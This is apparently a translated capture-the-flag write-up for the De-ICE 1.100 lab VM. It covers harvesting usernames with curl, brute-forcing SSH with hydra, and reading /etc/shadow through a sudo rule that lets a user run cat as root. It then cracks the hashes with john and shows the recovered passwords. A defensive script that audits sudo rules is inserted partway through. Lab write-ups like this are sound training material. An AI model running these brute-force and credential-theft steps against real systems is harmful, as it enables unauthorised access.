• john and hydra using de-ice1.100


      

    Configure the IP: ifconfig eth0 192.168.179.111

    http://192.168.179.111/index2.php

    curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9.-]+@"

    curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9.-]+@" |cut -d "@" -f1

    Extract the email addresses

    curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)"

    Crack the passwords with hydra

    hydra -L /home/user.txt -P /home/unix_passwords.txt -t 5 ssh://192.168.179.111

    Contents of user.txt

    princess
    marym
    patrickp
    thompsont
    benedictb
    genniege
    michaelp
    elong
    aadams
    bbanter
    ccoffee
    nostradamus

    bbanter@slax:~$ cat /etc/group
    root::0:root
    bin::1:root,bin,daemon
    daemon::2:root,bin,daemon
    sys::3:root,bin,adm
    adm::4:root,adm,daemon
    tty::5:
    disk::6:root,adm
    lp::7:lp
    mem::8:
    kmem::9:
    wheel::10:root

    aadams:x:1000:10:,,,:/home/aadams:/bin/bash
    bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
    ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

    aadams is in the wheel group; wheel is similar to an administrators group.

    Run sudo -l
    aadams@slax:~$ sudo -l
    
    We trust you have received the usual lecture from the local System
    Administrator. It usually boils down to these three things:
    
        #1) Respect the privacy of others.
        #2) Think before you type.
        #3) With great power comes great responsibility.
    
    Password:
    User aadams may run the following commands on this host:
        (root) NOEXEC: /bin/ls
        (root) NOEXEC: /usr/bin/cat
        (root) NOEXEC: /usr/bin/more
        (root) NOEXEC: !/usr/bin/su *root*
    
    Use sudo to run the cat command
    aadams@slax:~$ sudo cat /etc/shadow
    Password:
    root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
    bin:*:9797:0:::::
    daemon:*:9797:0:::::
    adm:*:9797:0:::::
    lp:*:9797:0:::::
    sync:*:9797:0:::::
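
The sudo -l listing above tags every rule NOEXEC, which blocks shell escapes but does not limit which files cat or more may open as root. The following added example (not from the original post) is a shell sketch that reviews sudo -l output for such rules; SAMPLE reproduces the rule lines shown above, while the READERS list and the RISK/INFO/DENY labels are assumptions of this sketch.

```shell
#!/usr/bin/env bash
# Added example: review `sudo -l` output for unrestricted file readers run as root.
# READERS is an assumption of this sketch: the two file readers that appear on the page.
READERS="cat more"

# Sample input: the rule lines from the sudo -l listing above.
SAMPLE='User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*'

# audit_sudo_l: reads `sudo -l` output on stdin, prints one verdict per rule line.
audit_sudo_l() {
  awk -v readers="$READERS" '
    BEGIN { n = split(readers, r, " "); for (i = 1; i <= n; i++) reader[r[i]] = 1 }
    # Rule lines look like: (runas) [TAG:]... command [args]
    /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
      runas = line; sub(/\).*/, "", runas); sub(/^\(/, "", runas)
      rest = line; sub(/^\([^)]*\)[ \t]*/, "", rest)
      # Peel off tags such as NOEXEC: or NOPASSWD: in front of the command.
      tags = ""
      while (match(rest, /^[A-Z_]+:[ \t]*/)) {
        tags = tags substr(rest, 1, RLENGTH); rest = substr(rest, RLENGTH + 1)
      }
      gsub(/[ \t]/, "", tags)
      # A leading ! is a negated (denied) command, not a grant.
      if (substr(rest, 1, 1) == "!") { print "DENY  " rest; next }
      nf = split(rest, w, /[ \t]+/)
      cmd = w[1]; base = cmd; sub(/.*\//, "", base)
      # Only the no-argument case is flagged: the reader may open any path as root.
      if ((runas == "root" || runas == "ALL") && reader[base] && nf == 1)
        print "RISK  " cmd " as " runas " [" tags "] no argument limit: can read root-only files such as /etc/shadow"
      else
        print "INFO  " cmd " as " runas " [" tags "]"
    }'
}

printf '%s\n' "$SAMPLE" | audit_sudo_l
```

On a live host the same function can be fed with `sudo -l | audit_sudo_l`; a rule that pins the reader to a specific file path is reported as INFO rather than RISK.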


    Crack the shadow passwords with john
    john --format=aix-smd5 --wordlist=/home/rockyou.txt mm.txt
    The results are as follows
    root:tarot:13553:0:::::
    aadams:nostradamus:13550:0:99999:7:::
    bbanter:bbanter:13550:0:99999:7:::
    ccoffee:hierophant:13550:0:99999:7:::
    When trying to log in as root, it turned out that root is not allowed to log in remotely.
    You can log in as a normal user and then su to root.

    Download link for rockyou.txt:
    https://pan.baidu.com/s/1hfnY4bkZ9UABbQ_kdjRUfw


  • Original article: https://www.cnblogs.com/p20050001/p/8709486.html